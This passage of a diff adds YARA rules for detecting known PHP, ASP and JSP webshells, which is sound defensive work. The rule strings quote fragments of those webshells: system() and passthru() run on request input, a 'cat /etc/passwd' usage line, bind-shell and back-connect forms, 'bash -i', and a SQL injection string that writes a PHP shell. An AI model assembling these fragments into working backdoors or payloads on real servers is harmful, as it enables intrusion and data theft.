+		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
+		$s11 = "if (file_exists($uploaded)) {" fullword
+		$s12 = "copy($uploaded, $dez);" fullword
+		$s17 = "passthru($cmd);" fullword
+	condition:
+		4 of them
+}
+rule WebShell_reader_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file reader.asp.php.txt"
+		author = "Florian Roth"
+		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
+	strings:
+		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
+		$s12 = " HACKING " fullword
+		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
+		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
+	condition:
+		3 of them
+}
+rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
+		author = "Florian Roth"
+		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
+	strings:
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
+		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
+		$s15 = "if(empty($_GET['file'])){" fullword
+		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
+	condition:
+		3 of them
+}
+rule WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
+	meta:
+		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		author = "Florian Roth"
+		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
+	strings:
+		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
+		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword
+		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
+		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
+		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file php-backdoor.php"
+		author = "Florian Roth"
+		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
+	strings:
+		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
+		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
+		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
+		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
+		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+	condition:
+		1 of them
+}
+rule WebShell_Worse_Linux_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
+		author = "Florian Roth"
+		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
+	strings:
+		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
+		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
+		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
+		$s8 = "$currentCMD = \"ls -la\";" fullword
+		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
+		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_pHpINJ {
+	meta:
+		description = "PHP Webshells Github Archive - file pHpINJ.php"
+		author = "Florian Roth"
+		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
+	strings:
+		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
+		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
+		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
+		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
+		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
+		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
+		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_NGH {
+	meta:
+		description = "PHP Webshells Github Archive - file NGH.php"
+		author = "Florian Roth"
+		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
+	strings:
+		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
+		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
+		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
+		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
+		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
+		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
+		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_matamu {
+	meta:
+		description = "PHP Webshells Github Archive - file matamu.php"
+		author = "Florian Roth"
+		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
+	strings:
+		$s2 = "$command .= ' -F';" fullword
+		$s3 = "/* We try and match a cd command. */" fullword
+		$s4 = "directory... Trust me - it works :-) */" fullword
+		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
+		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
+		$s16 = "/* The last / in work_dir were the first charecter." fullword
+	condition:
+		2 of them
+}
+rule WebShell_ru24_post_sh {
+	meta:
+		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
+		author = "Florian Roth"
+		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
+	strings:
+		$s1 = "http://www.ru24-team.net" fullword
+		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s6 = "Ru24PostWebShell"
+		$s7 = "Writed by DreAmeRz" fullword
+		$s9 = "$function=passthru; // system, exec, cmd" fullword
+	condition:
+		1 of them
+}
+rule WebShell_hiddens_shell_v1 {
+	meta:
+		description = "PHP Webshells Github Archive - file hiddens shell v1.php"
+		author = "Florian Roth"
+		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
+	strings:
+		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+	condition:
+		all of them
+}
+rule WebShell_c99_madnet {
+	meta:
+		description = "PHP Webshells Github Archive - file c99_madnet.php"
+		author = "Florian Roth"
+		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
+	strings:
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"pass\";  //Pass" fullword
+		$s3 = "$login = \"user\"; //Login" fullword
+		$s4 = "             //Authentication" fullword
+	condition:
+		all of them
+}
+rule WebShell_c99_locus7s {
+	meta:
+		description = "PHP Webshells Github Archive - file c99_locus7s.php"
+		author = "Florian Roth"
+		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
+	strings:
+		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
+		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
+		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
+		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
+		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
+	condition:
+		2 of them
+}
+rule WebShell_JspWebshell_1_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
+		author = "Florian Roth"
+		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
+	strings:
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s1 = "String password=request.getParameter(\"password\");" fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword
+		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
+		$s12 = "password = (String)session.getAttribute(\"password\");" fullword
+	condition:
+		3 of them
+}
+rule WebShell_safe0ver {
+	meta:
+		description = "PHP Webshells Github Archive - file safe0ver.php"
+		author = "Florian Roth"
+		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
+	strings:
+		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
+		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
+		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword
+		$s7 = "$contents .= htmlentities( $line ) ;" fullword
+		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
+		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s20 = "/* <!-- End of Actions --> */" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Uploader {
+	meta:
+		description = "PHP Webshells Github Archive - file Uploader.php"
+		author = "Florian Roth"
+		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
+	strings:
+		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_kral {
+	meta:
+		description = "PHP Webshells Github Archive - file kral.php"
+		author = "Florian Roth"
+		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
+	strings:
+		$s1 = "$adres=gethostbyname($ip);" fullword
+		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
+		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
+		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
+		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
+		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
+	condition:
+		2 of them
+}
+rule WebShell_cgitelnet {
+	meta:
+		description = "PHP Webshells Github Archive - file cgitelnet.php"
+		author = "Florian Roth"
+		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
+	strings:
+		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword
+		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
+		$s18 = "# in a command line on Windows NT." fullword
+		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_simple_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file simple-backdoor.php"
+		author = "Florian Roth"
+		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
+	strings:
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s3 = "        echo \"</pre>\";" fullword
+		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
+		$s5 = "        echo \"<pre>\";" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s7 = "        die;" fullword
+		$s8 = "        system($cmd);" fullword
+	condition:
+		all of them
+}
+rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		author = "Florian Roth"
+		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
+	strings:
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
+		$s4 = "$v = @ini_get(\"open_basedir\");" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_NTDaddy_v1_9 {
+	meta:
+		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
+		author = "Florian Roth"
+		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
+	strings:
+		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword
+		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s13 = "<form action=ntdaddy.asp method=post>" fullword
+		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
+	condition:
+		2 of them
+}
+rule WebShell_lamashell {
+	meta:
+		description = "PHP Webshells Github Archive - file lamashell.php"
+		author = "Florian Roth"
+		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
+	strings:
+		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
+		$s8 = "$curcmd = $_POST['king'];" fullword
+		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
+		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
+		$s19 = "_|_  O    _    O  _|_" fullword
+		$s20 = "$curcmd = \"ls -lah\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Simple_PHP_backdoor_by_DK {
+	meta:
+		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
+		author = "Florian Roth"
+		hash = "03f6215548ed370bec0332199be7c4f68105274e"
+	strings:
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s8 = "system($cmd);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT {
+	meta:
+		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
+		author = "Florian Roth"
+		hash = "31e5473920a2cc445d246bc5820037d8fe383201"
+	strings:
+		$s4 = "$content = chunk_split(base64_encode($content)); " fullword
+		$s12 = "print \"Sending mail to $to....... \"; " fullword
+		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
+	condition:
+		all of them
+}
+rule WebShell_C99madShell_v__2_0_madnet_edition {
+	meta:
+		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
+		author = "Florian Roth"
+		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
+	strings:
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"\";  //Pass" fullword
+		$s3 = "$login = \"\"; //Login" fullword
+		$s4 = "//Authentication" fullword
+	condition:
+		all of them
+}
+rule WebShell_CmdAsp_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
+		author = "Florian Roth"
+		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
+	strings:
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
+		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
+		$s6 = "' --------------------o0o--------------------" fullword
+		$s8 = "' File: CmdAsp.asp" fullword
+		$s11 = "<-- CmdAsp.asp -->" fullword
+		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
+		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+	condition:
+		4 of them
+}
+rule WebShell_NCC_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file NCC-Shell.php"
+		author = "Florian Roth"
+		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
+	strings:
+		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
+		$s1 = "<b>--Coded by Silver" fullword
+		$s2 = "<title>Upload - Shell/Datei</title>" fullword
+		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
+		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
+		$s18 = "printf(\"Sie ist %u Bytes gro" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_README {
+	meta:
+		description = "PHP Webshells Github Archive - file README.md"
+		author = "Florian Roth"
+		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
+	strings:
+		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
+		$s1 = "php-webshells" fullword
+	condition:
+		all of them
+}
+rule WebShell_backupsql {
+	meta:
+		description = "PHP Webshells Github Archive - file backupsql.php"
+		author = "Florian Roth"
+		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
+	strings:
+		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
+		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
+		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
+		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
+	condition:
+		2 of them
+}
+rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version {
+	meta:
+		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+		author = "Florian Roth"
+		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
+	strings:
+		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
+		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
+		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_cpanel {
+	meta:
+		description = "PHP Webshells Github Archive - file cpanel.php"
+		author = "Florian Roth"
+		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
+	strings:
+		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
+		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
+		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
+		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
+		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
+		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_accept_language {
+	meta:
+		description = "PHP Webshells Github Archive - file accept_language.php"
+		author = "Florian Roth"
+		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
+	strings:
+		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_529 {
+	meta:
+		description = "PHP Webshells Github Archive - file 529.php"
+		author = "Florian Roth"
+		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
+	strings:
+		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
+		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
+		$s9 = "echo '<PRE><P>This is exploit from <a " fullword
+		$s10 = "This Exploit Was Edited By KingDefacer" fullword
+		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
+		$s14 = "$hardstyle = explode(\"/\", $file); " fullword
+		$s20 = "while($level--) chdir(\"..\"); " fullword
+	condition:
+		2 of them
+}
+rule WebShell_STNC_WebShell_v0_8 {
+	meta:
+		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+		author = "Florian Roth"
+		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
+	strings:
+		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
+		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
+		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_tryag {
+	meta:
+		description = "PHP Webshells Github Archive - file tryag.php"
+		author = "Florian Roth"
+		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
+	strings:
+		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
+		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
+		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
+		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
+		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
+	condition:
+		3 of them
+}
+rule WebShell_dC3_Security_Crew_Shell_PRiV_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
+		author = "Florian Roth"
+		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
+	strings:
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
+		$s13 = "header(\"Content-type: image/gif\");" fullword
+		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_qsd_php_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
+		author = "Florian Roth"
+		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
+	strings:
+		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
+		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword
+		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword
+		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_spygrup {
+	meta:
+		description = "PHP Webshells Github Archive - file spygrup.php"
+		author = "Florian Roth"
+		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
+	strings:
+		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
+		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
+		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
+		$s18 = "By KingDefacer From Spygrup.org>" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Web_shell__c_ShAnKaR {
+	meta:
+		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
+		author = "Florian Roth"
+		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
+	strings:
+		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
+		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
+		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
+		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz {
+	meta:
+		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
+		author = "Florian Roth"
+		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
+	strings:
+		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
+		$s11 = "directory... Trust me - it works :-) */" fullword
+		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
+		$s16 = "} else if ($command == 'ls') {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Gamma_Web_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
+		author = "Florian Roth"
+		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
+	strings:
+		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
+		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
+		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
+		$s20 = "my $command = $self->query('command');" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_aspydrv {
+	meta:
+		description = "PHP Webshells Github Archive - file aspydrv.php"
+		author = "Florian Roth"
+		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
+	strings:
+		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
+		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
+		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
+		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
+		$s20 = "' ---Copy Too Folder routine Start" fullword
+	condition:
+		3 of them
+}
+rule WebShell_JspWebshell_1_2_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
+		author = "Florian Roth"
+		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
+	strings:
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
+		$s15 = "endPoint=random1.getFilePointer();" fullword
+		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_g00nshell_v1_3 {
+	meta:
+		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
+		author = "Florian Roth"
+		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
+	strings:
+		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
+		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
+		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
+		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
+		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
+	condition:
+		2 of them
+}
+rule WebShell_WinX_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file WinX Shell.php"
+		author = "Florian Roth"
+		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
+	strings:
+		$s4 = "// It's simple shell for all Win OS." fullword
+		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
+		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
+		$s13 = "// Created by greenwood from n57" fullword
+		$s20 = " if (is_uploaded_file($userfile)) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_PHANTASMA {
+	meta:
+		description = "PHP Webshells Github Archive - file PHANTASMA.php"
+		author = "Florian Roth"
+		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
+	strings:
+		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
+		$s15 = "if ($portscan != \"\") {" fullword
+		$s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
+		$s20 = "$dono = get_current_user( );" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_cw {
+	meta:
+		description = "PHP Webshells Github Archive - file cw.php"
+		author = "Florian Roth"
+		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
+	strings:
+		$s1 = "// Dump Database [pacucci.com]" fullword
+		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
+		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
+		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
+		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
+		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_include_w_shell {
+	meta:
+		description = "PHP Webshells Github Archive - file php-include-w-shell.php"
+		author = "Florian Roth"
+		hash = "1a7f4868691410830ad954360950e37c582b0292"
+	strings:
+		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
+		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
+		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
+	condition:
+		1 of them
+}
+rule WebShell_mysql_tool {
+	meta:
+		description = "PHP Webshells Github Archive - file mysql_tool.php"
+		author = "Florian Roth"
